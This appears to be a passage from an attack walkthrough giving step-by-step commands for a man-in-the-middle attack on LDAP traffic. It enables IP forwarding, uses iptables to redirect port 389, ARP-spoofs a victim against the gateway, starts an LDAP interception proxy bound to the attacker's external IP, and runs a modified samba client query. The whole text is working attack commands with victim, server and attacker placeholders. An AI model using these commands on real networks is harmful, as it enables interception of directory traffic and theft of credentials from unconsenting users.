Enable IP-packet forwarding with the following command:

echo '1' > /proc/sys/net/ipv4/ip_forward

Redirect the LDAP packets to our proxy with iptables:

iptables -t nat -A PREROUTING -i eth0 -p tcp -s <victim ip> -d <server ip> --dport 389 -j REDIRECT --to-port 389

ARP SPOOF the victim with the following command:

arpspoof -t <victim ip> <gateway ip>

Start our LDAP proxy with the following command:

ldap_catchblob -s <server ip> -l <attacker's external ip> -p 389

Run the modified samba net client:

net ads search cn='<username>'